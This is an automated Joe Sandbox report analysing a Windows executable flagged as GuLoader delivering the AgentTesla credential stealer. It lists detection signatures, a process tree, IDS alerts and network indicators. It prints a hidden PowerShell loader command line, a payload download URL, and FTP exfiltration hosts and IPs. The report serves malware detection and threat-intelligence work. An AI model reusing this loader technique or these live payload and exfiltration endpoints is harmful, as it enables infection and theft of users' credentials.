Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
24100311.EXE.exe

Overview

General Information

Sample name:24100311.EXE.exe
Analysis ID:1524867
MD5:36c593a2ceb2680510f2094cd6e4010d
SHA1:03f1e81a26c614bcac620bbcd7a90f078e7d6146
SHA256:faa7829ce9f42c0f66f754bda78ed09257191d44be15b16583e1a2df1eceff64
Tags:exeuser-adam_zbadam
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 24100311.EXE.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\24100311.EXE.exe" MD5: 36C593A2CEB2680510F2094CD6E4010D)
    • powershell.exe (PID: 7372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7860 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2947539010.0000000021FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.2947539010.0000000021FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000001.00000002.2049174087.000000000A206000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: msiexec.exe PID: 7860JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 109.73.128.91, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7860, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24100311.EXE.exe", ParentImage: C:\Users\user\Desktop\24100311.EXE.exe, ParentProcessId: 7336, ParentProcessName: 24100311.EXE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)", ProcessId: 7372, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-03T10:51:43.838009+020020299271A Network Trojan was detected192.168.2.449737185.146.87.12821TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-03T10:51:44.445474+020028555421A Network Trojan was detected192.168.2.449738185.146.87.12849543TCP
              2024-10-03T10:51:44.450939+020028555421A Network Trojan was detected192.168.2.449738185.146.87.12849543TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-03T10:51:39.704429+020028032702Potentially Bad Traffic192.168.2.449736109.73.128.91443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 24100311.EXE.exeAvira: detected
              Source: 24100311.EXE.exeVirustotal: Detection: 15%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.9% probability
              Source: 24100311.EXE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 109.73.128.91:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: 24100311.EXE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2044142173.000000000724B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdb1 source: powershell.exe, 00000001.00000002.2047324172.00000000081C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbg#1sO' source: powershell.exe, 00000001.00000002.2047324172.00000000081C0000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49737 -> 185.146.87.128:21
              Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49738 -> 185.146.87.128:49543
              Source: global trafficTCP traffic: 192.168.2.4:49738 -> 185.146.87.128:49543
              Source: Joe Sandbox ViewIP Address: 185.146.87.128 185.146.87.128
              Source: Joe Sandbox ViewASN Name: GTSCEGTSCentralEuropeAntelGermanyCZ GTSCEGTSCentralEuropeAntelGermanyCZ
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 109.73.128.91:443
              Source: unknownFTP traffic detected: 185.146.87.128:21 -> 192.168.2.4:49737 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: global trafficHTTP traffic detected: GET /bazyland/whwWkpNOyoMrBlLiWEjvE44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.corella.roCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /bazyland/whwWkpNOyoMrBlLiWEjvE44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.corella.roCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.corella.ro
              Source: global trafficDNS traffic detected: DNS query: ftp.rusticpensiune.ro
              Source: msiexec.exe, 00000006.00000002.2947539010.0000000022005000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.rusticpensiune.ro
              Source: 24100311.EXE.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.2040294187.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2040294187.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.2040294187.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.2040294187.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
              Source: powershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.2040294187.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exe, 00000006.00000002.2931037935.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/
              Source: msiexec.exe, 00000006.00000002.2931037935.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/D5
              Source: msiexec.exe, 00000006.00000002.2946495620.0000000021670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2931037935.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin
              Source: msiexec.exe, 00000006.00000002.2931037935.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binA
              Source: msiexec.exe, 00000006.00000002.2946495620.0000000021670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binKokisUrawww.creditesimplebm.ro/tmp-image/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownHTTPS traffic detected: 109.73.128.91:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E3
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile created: C:\Windows\resources\0809\catapultic.iniJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_00406C5B0_2_00406C5B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072CCFFE1_2_072CCFFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21F64A586_2_21F64A58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21F68CA06_2_21F68CA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21F641886_2_21F64188
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21F694686_2_21F69468
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21F6C6E86_2_21F6C6E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21F60D586_2_21F60D58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_21F63E406_2_21F63E40
              Source: 24100311.EXE.exeStatic PE information: invalid certificate
              Source: 24100311.EXE.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: 24100311.EXE.exe, 00000000.00000000.1668582496.00000000004A6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameprigger hobbledygee.exe8 vs 24100311.EXE.exe
              Source: 24100311.EXE.exeBinary or memory string: OriginalFilenameprigger hobbledygee.exe8 vs 24100311.EXE.exe
              Source: 24100311.EXE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/14@2/2
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404983
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile created: C:\Program Files (x86)\Common Files\Glued.lnkJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile created: C:\Users\user\AppData\Local\DecentraliseringersJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\nseDBF2.tmpJump to behavior
              Source: 24100311.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 24100311.EXE.exeVirustotal: Detection: 15%
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile read: C:\Users\user\Desktop\24100311.EXE.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\24100311.EXE.exe "C:\Users\user\Desktop\24100311.EXE.exe"
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
